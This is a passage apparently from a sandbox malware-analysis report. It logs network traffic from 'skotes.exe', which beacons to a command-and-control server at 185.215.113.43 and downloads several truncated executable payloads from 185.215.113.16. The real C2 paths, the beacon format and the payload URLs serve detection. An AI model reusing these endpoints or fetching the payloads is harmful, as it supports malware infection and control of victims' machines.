                                                                                                                                                                                                                                                                          Data Ascii: { "id1": "McrSMDEQlisW3cFq1734740102", "data": "Done2" }
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:46.292679071 CET160INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.22.1
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:46 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Data Raw: 6f 6b 61 79
                                                                                                                                                                                                                                                                          Data Ascii: okay


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          31192.168.2.550152185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:50.283886909 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018977001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:51.589199066 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:51 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          32192.168.2.550156185.215.113.16802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:51.789165974 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.119507074 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:52 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 2918912
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 23:16:13 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765fabd-2c8a00"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 c0 4f 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4f 00 00 04 00 00 b5 c9 2c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(O@O,@M$a$$ $h@.rsrc$x@.idata $z@ndsdenmy*$*|@hxkdstdhOb,@.taggant0O"h,@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.119587898 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.119626999 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.119724035 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.119802952 CET1236INData Raw: 71 45 48 d5 ae 0d 66 78 6d fc 24 f1 60 c4 89 1b 32 b0 bd 91 ae cc 82 61 56 c4 45 36 52 50 8d 8a 1e 8e 95 73 2e 16 9d 1b 63 fa 6e 97 8d 66 8b 65 86 64 6d 71 8a d4 7d 25 62 c4 d1 c8 18 b3 d5 b8 72 c8 e9 c9 4a 52 8d 71 6f 9c 81 49 5a a4 bd 70 2c 63
                                                                                                                                                                                                                                                                          Data Ascii: qEHfxm$`2aVE6RPs.cnfedmq}%brJRqoIZp,c^;`_Vk<;p*3+6]nRyz^*jr985IF:M2CoMzc%F3e%nTeTMa&^ex d4EPrwI6
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.119837999 CET1236INData Raw: 1c 6c 8b ad 51 54 91 78 71 c3 3e 44 d6 97 f0 df 7d ac 09 a8 20 64 b6 60 f7 71 e6 fd 21 b4 5a c0 bb ee bc a6 3a f1 2a 21 8b f5 e5 f3 e6 f9 bd 15 53 35 bc 0a 1a 99 66 21 37 2d c3 5b 7f c6 7b e2 fa fb 88 11 bb e1 bc 36 82 d3 8b ea 62 e4 bd d4 a1 d1
                                                                                                                                                                                                                                                                          Data Ascii: lQTxq>D} d`q!Z:*!S5f!7-[{6bfwXMV9}vbj{60BX-ELz`/&+iv)wXOVJ5_uxs:u FFGRGaix\9Da::0U'kI
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.119873047 CET1236INData Raw: 70 fd 95 d5 1c 4c e4 09 bb be c3 68 21 ab 04 5b 1c 30 b4 f1 71 db 0d 6c 60 0e 4e 68 ee c4 e9 f9 6a 6e b0 f7 f9 fc f5 66 e6 50 e7 71 b6 0f 02 30 34 6a 43 70 3a ac 39 85 81 c0 56 6c 10 90 ad 79 78 a4 bb 65 c6 db dd ec 1c 86 6d 91 1c bc 75 d5 56 43
                                                                                                                                                                                                                                                                          Data Ascii: pLh![0ql`NhjnfPq04jCp:9VlyxemuVC}zTI)T=@)Cn`pe(MEe*x.o7d[QhH&xaNP{v{4Fmp"?gh~Z<BexQ-g"$?eg}PRgrG
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.120115042 CET1236INData Raw: 3a 95 bb 8c d0 a8 1d dd b9 31 bd 6d cf 51 21 23 62 c2 b5 35 ba 3b 7e 54 39 dc bd 67 b2 0f a6 61 94 d5 64 d6 22 bb 85 70 ce 50 87 65 59 ee 94 65 ca c2 e4 9d 3a b4 3e e9 76 40 9c 81 12 c2 87 cd 21 1c 40 80 3c f5 bd 71 55 37 dd 3b 62 00 95 79 ce 0e
                                                                                                                                                                                                                                                                          Data Ascii: :1mQ!#b5;~T9gad"pPeYe:>v@!@<qU7;byvJ)rzviqj@-?I)B)Pk-}Tm,dg)Ig3rTeg.>:F"m:xFQQb9zDNc<iF2NxC !D{PJ
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.120150089 CET1236INData Raw: 0e c3 04 df 20 ff b4 65 6e 2a c9 67 22 98 89 fd ba 04 d3 23 db c4 dd 8d 9e a0 bb 78 ce bf dc d6 b8 0c bc 69 62 50 ed db 7a bd 7c 54 7e ec b0 67 d1 c4 b1 e3 b8 57 bf d6 f9 4f a2 49 38 b3 8d 32 d2 b3 88 b5 20 37 45 d4 1c 44 7d 7e b6 40 03 67 ba 3c
                                                                                                                                                                                                                                                                          Data Ascii: en*g"#xibPz|T~gWOI82 7ED}~@g<PPG2@b,p.u+:PES<}-M/U)pwVxn:uZfHpK:'P}jby;dI)@Qt9Fh=)mF+:I9LC_`BM
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.120184898 CET1236INData Raw: 7e c2 b5 d5 ae 58 3e 14 2c ce 6a 4f 5a 40 ac 1b a6 bb 91 e3 20 67 c4 8b 34 30 49 67 c2 ae 0d db 53 81 c4 f0 f6 18 84 68 92 47 c9 d7 3b bf bb c1 f1 cb d7 19 de 50 e1 ad 50 00 49 1b d7 ae bb b5 21 68 bd c1 d1 0e 39 61 1f 3c 5e d9 1c c4 80 e1 4e 47
                                                                                                                                                                                                                                                                          Data Ascii: ~X>,jOZ@ g40IgShG;PPI!h9a<^NG<NJlq?kFO}:LPaPu{'wUz-'RgCB(gZ1,qC-=)e_QbTrptPDgjaPeK 7{cVJ`6{ZonIj3@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:15:53.239289999 CET1236INData Raw: 52 c6 ab a6 14 f3 ae 31 26 7e 43 2a 78 f4 3d 1c 61 20 81 6f 56 02 fb be b8 aa b2 95 9d a2 e7 25 35 b9 b9 27 b5 6a e4 5e 6d e2 d4 8f 14 82 82 bf 21 5b e5 a3 6a ba a9 a9 62 42 e4 75 1d 4f b1 e1 46 70 59 2b b4 0b fe 0c 3b 31 f8 14 be a6 a9 f1 fe c3
                                                                                                                                                                                                                                                                          Data Ascii: R1&~C*x=a oV%5'j^m![jbBuOFpY+;15aAE;i,m<ia{F|=bg)~zWR_wh-*va#BmsjtOJG@bAOq7^*<75bRt@$WwPK(!'x


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          33192.168.2.550166185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:00.314933062 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018978001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:01.690363884 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:01 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          34192.168.2.550168185.215.113.16802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:01.817116022 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.196366072 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:02 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 970240
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 23:13:40 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765fa24-ece00"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 fa 65 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1e 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELeg"w@0/@@@d|@cu4@.text `.rdata@@.datalpH@.rsrcc@d@@.relocuvX@B
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.196476936 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
                                                                                                                                                                                                                                                                          Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.196495056 CET1236INData Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7
                                                                                                                                                                                                                                                                          Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY|#l)\DItv
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.196623087 CET372INData Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c
                                                                                                                                                                                                                                                                          Data Ascii: N^VW3DNF|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.196640015 CET1236INData Raw: 8b 75 08 57 8b f9 56 83 67 08 00 e8 eb e5 00 00 8a 46 10 8d 4f 20 88 47 10 8b 46 14 89 47 14 8a 46 18 88 47 18 8d 46 20 83 61 08 00 50 e8 c9 e5 00 00 8a 46 30 88 47 30 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 89 11 40 89 41 0c 89 51 08 88 51 10 89 51
                                                                                                                                                                                                                                                                          Data Ascii: uWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&NW LjE$|I IF^jAZ @uSV5I3WjXSG
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.196655989 CET1236INData Raw: 00 8b 41 0c 83 e8 01 74 29 83 e8 01 0f 84 d4 07 04 00 83 e8 01 0f 84 bb 07 04 00 83 e8 01 74 19 83 e8 03 74 0d 48 83 e8 01 0f 85 97 07 04 00 8a 01 c3 83 39 00 0f 95 c0 c3 8b 41 08 83 78 04 00 eb f3 55 8b ec 53 56 8b 75 08 33 db 57 8a d3 8b 0e 8d
                                                                                                                                                                                                                                                                          Data Ascii: At)ttH9AxUSVu3WyQ>t(M@f9Xu8!tt_^3[]U3BSVWPPUUJ(MO1f~u6 t+u+3+fy4
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.196679115 CET1236INData Raw: 7f 05 04 00 3b fb 0f 84 26 fe ff ff e9 72 05 04 00 83 38 05 0f 85 d0 fe ff ff ff 45 f4 8d 45 ec 89 7d ec 8d 8d 54 ff ff ff 50 47 e8 5a 03 00 00 8b 45 d8 8b 48 04 8b 85 58 ff ff ff 89 45 bc e9 a6 fe ff ff 83 e8 21 0f 85 23 01 00 00 8b 41 04 6a 7f
                                                                                                                                                                                                                                                                          Data Ascii: ;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuWAjYf9HEHOTE]ETpXEE
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.196696997 CET1236INData Raw: 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e 01 04 00 33 c0 5d c2 20 00 6a ff 6a 77 e9 73 01 04 00 6a ff 6a 73 e9 6a 01 04 00 55 8b ec 83 ec 0c 56 8b f1 8b 46 0c 83 f8 06 7d 03 5e c9 c3 57 33 c9 6a 04 5a f7 e2 0f
                                                                                                                                                                                                                                                                          Data Ascii: }} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;|SA23~,FDMEuNGA;|u[_FMFMLU,SVWL$(D$83
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.196924925 CET1236INData Raw: 10 00 55 8b ec 83 ec 74 53 56 33 db 8d 4d 94 57 89 5d 90 e8 14 7b 00 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 4d 00 8a 45 b4 88 01 8b ce e8 db 0b 00 00 68 9c ca 49 00 8d 4d e0
                                                                                                                                                                                                                                                                          Data Ascii: UtSV3MW]{uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxME
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.196958065 CET1236INData Raw: 8d 8b 8c 00 00 00 89 07 8d 45 fc 50 e8 07 00 00 00 5f 5e 5b c9 c2 04 00 55 8b ec 56 6a 08 8b f1 e8 ad ca 01 00 8b 55 08 59 8b c8 8b 12 83 61 04 00 89 11 83 7e 04 00 75 0d 89 4e 04 ff 06 89 4e 08 5e 5d c2 04 00 8b 46 08 89 48 04 eb ee 55 8b ec b8
                                                                                                                                                                                                                                                                          Data Ascii: EP_^[UVjUYa~uNN^]FHUVEPPh1hIEt3fP7^VVYtf|F\u3fLF^UVW3FO;Qu_^]USVWue
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:03.316041946 CET776INData Raw: 8d 57 ff 85 ff 74 4b 8b 45 08 0f b7 00 89 45 fc 33 db 33 c9 66 85 c0 74 30 8b 45 f8 8b 7d 08 8b 00 0f b7 04 50 89 45 f4 8b 45 fc 0f b7 c0 66 39 45 f4 74 23 43 0f b7 04 5f 66 85 c0 75 f0 8b 7d f0 85 c9 0f 85 21 fb 03 00 8b c2 5f 5e 5b c9 c2 04 00
                                                                                                                                                                                                                                                                          Data Ascii: WtKEE33ft0E}PEEf9Et#C_fu}!_^[AUSVWh3D$D$SP9uM9uM9uMSW[Md$$D$F@D$


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          35192.168.2.550176185.215.113.43802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:07.863332033 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 38 39 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                          Data Ascii: d1=1018979001&unit=246122658369
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:09.203398943 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:08 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          36192.168.2.550181185.215.113.16802672C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:09.328572035 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                          Host: 185.215.113.16
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.703494072 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:09 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 2778624
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Dec 2024 23:14:15 GMT
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          ETag: "6765fa47-2a6600"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 2d 7c 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                          Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$* `@ *-|*`Ui`D @ @ @.rsrcD``@.idata f@kgxazxnt))h@fddzeiuw *>*@.taggant@*"D*@
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.703587055 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.703625917 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.703685045 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.703720093 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:16:10.703757048 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii:
